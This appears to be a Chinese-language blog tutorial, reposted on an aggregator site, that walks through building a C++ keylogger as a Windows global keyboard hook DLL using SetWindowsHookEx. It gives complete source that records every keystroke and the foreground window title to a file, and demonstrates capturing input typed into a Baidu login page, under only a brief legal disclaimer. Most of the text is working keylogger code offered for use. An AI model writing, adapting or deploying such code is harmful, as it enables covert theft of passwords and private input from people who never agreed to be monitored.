有一種技術被稱為HOOK，人們習慣上叫做鉤子。鉤子技術的應用范圍比較廣：輸入監控，API攔截，消息捕獲等等。

今天我們來做的是鍵盤記錄器

編譯工具:visual studio 2019
編程語言:自然是C++，Python做的我會寫個標題“C++”嗎？
編程技術:HOOK

另外我說一下:

中華人民共和國《網絡安全法》規定了：任何竊取他人信息都是違法的！本文僅供技術參考，若有人使用本文技術非法竊取他人信息，作者不承擔任何法律責任！

HOOK技術分為好幾種，我今天介紹一種:Windows鉤子
Windows鉤子又分為全局鉤子和局部鉤子.局部鉤子是針對一個線程的，而全局鉤子就針對整個操作系統.所以需要DLL文件來支持.

打開visual studio 2019，創建新項目->動態鏈接庫(DLL),如圖:

這個是我們要用到的函數SetWindowsHookEx()，定義如下

HHOOK SetWindowsHookEx(
In int idHook,
In HOOKPROC lpfn,
In_opt HINSTANCE hmod,
In DWORD dwThreadId);

來說說SetWindowsHookEx()的參數：
idHook：鉤子的類型，我們要用的就是WH_KEYBOARD
lpfn：制定鉤子函數地址，我們需要寫一個函數
hmod：模塊句柄
dwThreadId：表示需要被HOOK的線程ID號，如果為0的話就所有的線程都HOOK

UnhookWindowsHookEx()卸載鉤子，定義如下

BOOL UnhookWindowsHookEx( In HHOOK hhk);

hhk:鉤子句柄

開始實戰！！！

首先導出兩個函數

extern "C" _declspec(dllexport) BOOL SetHookOn(); extern "C" _declspec(dllexport) BOOL SetHookOff();

初始化，注意DllMain()不是DLLMain(),很多大佬都犯

HHOOK g_keyHook = NULL; HINSTANCE g_Inst = NULL; LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam); BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {g_Inst = (HINSTANCE)hModule;return TRUE; }

開啟鉤子函數

BOOL SetHookOn() {g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle(L"鍵盤HOOK"), 0);if (g_keyHook){return TRUE;}return FALSE; }

卸載鉤子函數

BOOL SetHookOff() {return UnhookWindowsHookEx(g_keyHook); }

鍵盤鉤子函數，前面是獲取窗口的標題

LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam) {HWND hWnd = GetForegroundWindow();DWORD dwProcess;LRESULT result = 0;DWORD dwPID = GetWindowThreadProcessId(hWnd, &dwProcess);HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);WCHAR wszProcessPath[MAX_PATH] = { 0 };DWORD dwSize = MAX_PATH;QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);CHAR wszTitle[MAX_PATH] = { 0 };result = GetWindowTextA(hWnd, wszTitle, MAX_PATH);FILE* fp = fopen("文件路徑", "a");if (fp == NULL)return CallNextHookEx(g_keyHook, code, wParam, lParam);if (lParam & 0x40000000){return CallNextHookEx(g_keyHook, code, wParam, lParam);}if (code == HC_NOREMOVE || code < 0){return CallNextHookEx(g_keyHook, code, wParam, lParam);}char szkeyName[100] = { 0 };GetKeyNameTextA(lParam, szkeyName, 100);fwrite(wszTitle, 1, strlen(wszTitle), fp);fwrite("\t", 1, 2, fp);fwrite(szkeyName, 1, strlen(szkeyName), fp);fwrite("\r\n", 1, 2, fp);fclose(fp);return CallNextHookEx(g_keyHook, code, wParam, lParam); }

我在fopen()的第一個參數下沒有寫文件路徑，你們自己創建一個txt文件，寫上路徑

完整代碼

#include "pch.h" #include <stdio.h>#pragma warning(disable:4996)extern "C" _declspec(dllexport) BOOL SetHookOn(); extern "C" _declspec(dllexport) BOOL SetHookOff();HHOOK g_keyHook = NULL; HINSTANCE g_Inst = NULL; LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam); BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved) {g_Inst = (HINSTANCE)hModule;return TRUE; }BOOL SetHookOn() {g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle(L"鍵盤HOOK"), 0);if (g_keyHook){return TRUE;}return FALSE; } BOOL SetHookOff() {return UnhookWindowsHookEx(g_keyHook);} LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam) {HWND hWnd = GetForegroundWindow();DWORD dwProcess;LRESULT result = 0;DWORD dwPID = GetWindowThreadProcessId(hWnd, &dwProcess);HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);WCHAR wszProcessPath[MAX_PATH] = { 0 };DWORD dwSize = MAX_PATH;QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);CHAR wszTitle[MAX_PATH] = { 0 };result = GetWindowTextA(hWnd, wszTitle, MAX_PATH);FILE* fp = fopen("", "a");if (fp == NULL)return CallNextHookEx(g_keyHook, code, wParam, lParam);if (lParam & 0x40000000){return CallNextHookEx(g_keyHook, code, wParam, lParam);}if (code == HC_NOREMOVE || code < 0){return CallNextHookEx(g_keyHook, code, wParam, lParam);}char szkeyName[100] = { 0 };GetKeyNameTextA(lParam, szkeyName, 100);fwrite(wszTitle, 1, strlen(wszTitle), fp);fwrite("\t", 1, 2, fp);fwrite(szkeyName, 1, strlen(szkeyName), fp);fwrite("\r\n", 1, 2, fp);fclose(fp);return CallNextHookEx(g_keyHook, code, wParam, lParam); }

生成一個lib和dll文件
創建一個MFC項目，弄兩個按鈕，…

項目展示：

我在百度登錄網站上輸入賬號：12345，然后按了一下大寫（Caps）,然后輸入ABCD

總結

以上是生活随笔為你收集整理的C++黑客编程:键盘记录器,HOOK技术实现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。